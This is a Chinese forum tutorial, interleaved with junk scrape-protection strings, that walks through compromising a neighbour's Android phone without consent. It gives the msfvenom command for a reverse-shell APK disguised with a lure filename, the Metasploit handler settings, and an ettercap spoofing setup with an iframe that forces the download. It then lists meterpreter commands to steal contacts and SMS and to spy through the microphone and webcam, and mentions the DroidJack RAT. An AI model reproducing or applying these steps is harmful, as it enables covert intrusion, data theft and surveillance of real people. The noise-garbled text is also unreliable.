5 P+ J( l- Y) w/ d& B# j
五、msf+ettercap入侵邻居安卓手机 % F, L) V1 g6 e' O
7 \% Q; ? w" [0 h
1 |$ h$ C2 `" f) N3 N Y2 H
首先启动msf " C# g( }+ c, A
+ b+ S! h* ~1 W+ h' Q) |
5 b% q5 {, l* ?7 F. R+ [. o% A1 | 先用kali生成一个安卓木马,如下命令: - K7 _2 [/ _, k8 I1 y3 R$ I3 c
) ^" y! E# W5 j" D$ M: o( M+ b. P1 O4 R8 K Y' g; I
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
% h9 \, p) _. V, m" N# Q! t 1 N1 B% b/ b3 l1 {9 g6 X! S
. U* i p+ V, \9 A
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 9 D" @$ k4 ^% E N( c3 r
3 K5 t1 Q+ }+ E P3 ^6 i3 W, L- A8 D; X, Q
然后进入msf
& M* ]; u3 q( B$ K" [) V / b. X5 C) i" I# D8 R& F! h
) N. S4 m1 k1 A$ w$ i! t% }+ x8 G
use exploit/multi/handler
9 V4 `! y# X4 ?' J! L- R1 p
+ y) v( a2 f- l2 _) \, l1 d( o; \7 p5 p% M( g) j" e
set payload android/meterpreter/reverse_tcp
( J$ u6 V. f4 r" G2 n( w6 }3 C
6 ^8 H" f. h! U4 ^1 l9 ~$ S( ~7 x
/ |* W1 c- h7 X set LHOST 192.168.0.109 //ip为kaili的ip * i' ^% K' L1 \: z, _/ _6 _, |
7 N2 c# A. p- q+ C
5 i l9 h& H) @' n3 J% X set LPORT 44444 //端口一定要与前面生成的木马的端口一致 4 Y ^: l; a I: U) \9 H; V
; }" ^, _* C# \( f( G
& a3 ]4 S: s, {$ M& {9 f* K
Exploit
. Z) u$ i8 l7 }+ q+ e, a
" O1 V: y, `) J" i" ~) s1 v! X3 {" d" z2 `2 r* e, `& M6 |
+ m T. Q8 `" S0 V3 J$ z
, T1 G! {: c- N! u4 N- a% [' g9 _5 o
G D( H% u1 |! |6 n) D. I 下面我们开启ettercap -G
& m- p+ E/ s; L, J7 [5 w; M
$ X! W8 c8 \' |
9 \- R" Q/ }& ?" I( ^# L3 G9 I 我物理IP为 6 w0 N% y1 v' ]; q2 `% q6 L6 z
; |3 T/ a$ L, E: \9 a
{, R& i6 |9 G: K! e% A7 B
- R/ M# z- x8 j4 r. b' e0 K % L) \; |8 { M& K' t* k
; E: c3 z6 }4 Z1 [9 a, R
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, * H, M9 o1 f( k5 I8 @( g
2 {; A& n9 u" ]- b2 g
; i; i4 S( L0 X9 n) q' b, H6 K" y! j- a
下面我们来设置一下
5 t( z5 X2 y8 l: M( T5 x * ^* O' t3 B( m$ U, l
' T3 z5 U1 i: c3 N# t* j' _7 v
1 P1 f! A6 u$ @ u6 y+ I$ L% R
- l7 i+ U/ K$ r; }
' g/ P: u- y9 U* @2 s" m1 J+ I
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了,
1 P' c* w6 A6 n : U5 o4 e* O7 R) z. a
6 g" z" f4 y: j4 W6 |8 j
: ~' t R6 g6 o/ [5 C/ K+ f6 ^; [0 X / h" c4 U6 X# q
3 d8 X1 g- _* t
A8 D/ k$ a5 Y
2 ~) A' p* P. I9 l8 f
/ F* ^5 @1 G0 R0 G8 `7 A& r 3 g& L4 S; X# B1 y) [; j( d
- L4 A% Q+ @9 j9 |4 |9 a
$ M# \! @: g8 V8 a( b9 }
9 z9 v) A, {, h, v* x4 u y# j3 w# _& ]) p, D6 E
8 X& O7 T9 Y2 ^* O( t
, [) w' f5 a. q# \( U- M " N0 N9 C. T3 O! B0 b
, i! `( p* m. |- R: @' q x J( g! b8 j+ H+ g. A" Z9 D( X
# j" @/ \) G8 |, I% o# g
" v0 l2 v/ B+ J& ?! J1 _; q/ _ ; u, D7 k& ~9 a0 X& D
& O3 q k, \# L: E
5 \5 F2 ^6 k. B$ v, {( g
' B3 Z6 ~( r& A. _5 s& ]
}( P0 w. Z) C' ~1 g V* r, z' j# U5 o: ]/ c$ Q
$ u' d, y% K2 `8 I- o# Z% Q
; v, P- _9 s# _7 F
1 n) ~, R* F- T6 Q+ R% t4 K
# T$ E( |# P, r" d- Z: ^6 t# I 7 p. m% u0 u4 E+ L; `8 h
$ {. j4 e; ]- N, K2 M+ i 4 ]8 g* s# |+ F4 f
0 u; x" A; l# b9 J( m+ X
% K$ o% M7 _. ?0 e' d3 i A# e " C9 M* g& x: f2 F1 D) u3 m: F
' L! L( B8 J" N; B# J
4 y( ?! K( {, ^0 a9 l$ |7 ^/ E
4 H9 P- O0 P+ O- K7 s9 n9 a
. e1 k# A' [9 U2 H2 C' b2 w9 ^3 Z9 H" D3 T: t4 N- T- z' Z
下面我们开始攻击
" u2 ?, U3 y1 K# z _7 c5 w6 U
# x6 i* \1 \1 B4 @+ k8 y" N- d* P" j' K9 ]
0 ~" I* ~+ M* W/ J/ d & _. V4 m% q! `6 W) A9 M
# z! i0 ^# k' v; y( D+ H1 W- r
/ {0 ^( ?3 L3 O4 ^4 D4 f) e ' d& V( i3 N- W( p1 e: B; Y1 H
- h% L5 I3 |& ^4 K * B' z; c) r) E& _- q
# D5 g0 W* A" b$ ~
$ x4 f/ ^: k& P) Z4 Q ! U4 h. g' }# o/ h, \
" B: v3 }2 T7 g! k( b4 p4 E
/ ?: @3 a6 T) _2 p& Q
4 D: [0 ^8 \! r+ T, l
# H, q2 ?7 h9 j2 S5 N$ c% S5 I( x
1 W: I1 @- z5 d( v1 o1 ] 大概过了5分钟多,发现反弹成功了
8 S; m! @) k! k- I3 e7 b' w5 x6 P; z
7 ?2 w# O9 G! L" c, l" l9 H' X4 D9 p6 G& D: W# V
0 {9 i) l* f! }+ _7 O/ z 3 l$ G( O, u; ]$ m6 V
( O# {& {; I3 i8 L. ?1 O & g$ Q7 y- q% P
7 L6 I$ B$ @0 X6 B+ s* r5 \4 \
' l, N j0 V6 F4 l j - R3 n3 X, S4 B. q
! W$ @6 \" b6 u% |5 U: Y- C0 E1 ~' p; z; W4 \ E0 k
* W3 _. ^7 E/ R4 C7 s, ~8 U ! I* a; k ~) P. c7 q
! V4 M4 W! u+ |+ T$ m. [
2 I$ i! p- J) P# ^
|" H5 V& ~2 j( _3 I9 U7 N
. W4 E# ^3 a& \6 Y
- _% ?$ [7 y& ]4 U" t
8 P3 s' ^$ T, ~$ t' E6 _/ S5 u
: ?8 u; X/ B$ T* {. M: d
3 S( z3 b8 a0 C1 ~: `+ ?7 C& b
, _, T% E$ a% E5 m* k
/ `* u8 c' z4 r6 @& p7 s: } 执行命令 ) @8 n8 ?8 p ?
% h# J' H7 C' z; L6 I5 l
4 ]+ A {7 R3 E) E& j' f 0 D" u( X& U9 k( n0 i
) z' I; u6 n" C: U
9 R+ [9 ^' J. [* g* |& V2 k dump_contacts --》这个是导出电话 % y" P( t$ B. w; n+ ~ \/ D2 q
8 I J% H4 X! G1 H7 Z! J
) Q. y( R8 Q4 ^6 p
dump_sms --》这个是导出信息 1 \* e$ F/ w0 P O# L" G
4 F- b) {; m5 R: t# d4 ~ d5 R% j7 o. ~0 P
record_mic Record audio from the default microphone for X seconds 8 q9 ]# |; [2 @3 p" l) N
) ?2 K8 k/ o& C* n' Z
+ ^$ B7 L, a8 T1 B$ e# ?9 C
webcam_chat Start a video chat 9 o- f! I: o2 M" k# z c5 g: c
& _2 Y1 c' \" i: O+ V1 Q2 G- Q5 I% W/ ~& v, B, B
webcam_list List webcams
5 Q( R L5 Y$ p) L; l7 M
- y/ a! L+ F: P3 E4 t5 H3 M+ x' K6 o/ K' R3 x7 T: @) n
webcam_snap Take a snapshot from the specified webcam
: d6 a0 z- R2 G. k' K* I* o
2 U) e8 g* [; K# i0 j% n4 b. b2 G- n" v
webcam_stream   lay a video stream from the specified webcam
7 d4 D: S& q/ h/ g1 T 4 _9 T0 v _$ M
0 X2 x6 i; n9 }! h& ` n ; E( o; ^( \5 N9 P& C: g. M
8 }: G. R1 ?2 G. j% A
5 U& i& Q# E$ J- x( U1 ~# C3 f$ s ! x- [8 O4 V- [. h
+ n; `& H5 b c3 o* v
: B$ y( r# Y1 L8 v! t) B* _
我们打开看一下电话薄,
/ W* v- D- M9 y2 Z0 x5 r9 Q- @
2 x4 o9 e8 g; N6 R; S% }
7 D/ D# A+ k& U7 q9 s
' W5 `, z3 u9 j% K/ y2 p' U * T3 [ M) x1 j9 I, ?, [
* O/ w! H$ P+ [
' k J3 e* _, x2 X7 c$ e
; Z t+ Q: C) b+ ]7 F+ ]( r g5 {' [# n( q8 \8 i% K
) Z8 T" q! z. Z( Y) k4 c 7 S! C1 H& | G5 U$ G2 }0 v
; i8 d e5 d( g
9 _8 a, r3 x5 d" T# s A
$ e2 O+ g! M: d( U
6 j- t, ~% D1 [# ?. [! e* E( y. \
( Q) l" U4 ~" f. K 4 n, [; V% { l, K. X
) k: b) i3 x+ g
; E$ _0 K3 E( ~% s9 y
0 n# h {, P# [8 w
, v! V# @/ J0 I; X 我们同时欺骗成DroidJack木马,使用方法如图:
( z) N6 i' m( U3 J9 K 3 C n1 w: F1 R8 A5 a
/ u/ X5 Q, E; R- `. `# S7 d
, u2 C3 J" |! I9 ?( g3 e9 r: n 8 h: c+ e/ \. D& q+ f
5 q( n6 M( Y) j) q$ M
7 i9 r% E Z% I! u$ ^
3 r0 r: U: Q% e9 o; ~ c
- H0 d6 ~5 R( k. t7 R) j2 h" q: P+ t
# l* B+ R( @8 Q
3 Y) ~$ o: q" m. Y" z* ^4 y Q# X0 z, A- p4 s
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 ) ^2 q- z# a3 Z2 B6 J5 ]
/ D. Y5 z2 V/ C) k
& n8 ^* E1 y8 e7 W$ Z2 A
2 T7 ]7 p# A$ Z. m# Q
' ]: K ~ O) K$ p# [2 z: @( `
! ^. W; E ~1 J, G+ G
5 R( B g- t# g$ b, @- r
& i/ S3 ~: L! m7 Z* `3 @- I/ w
( R6 J. h" r1 h f; Y3 h) W6 G7 ~& f I1 n* Q
- W; S2 F6 {3 N& k% C9 p 9 \, p6 \( I2 G( R# P7 { j3 E
- f( q' C' l, ]1 t 
9 q0 v6 P/ d9 W4 {; L: g
2 c8 W/ _6 \, A5 n. I/ O0 a
" [$ _2 K) ]1 \2 F6 f$ W& K( G ; c: h, e$ l4 v7 C8 A
|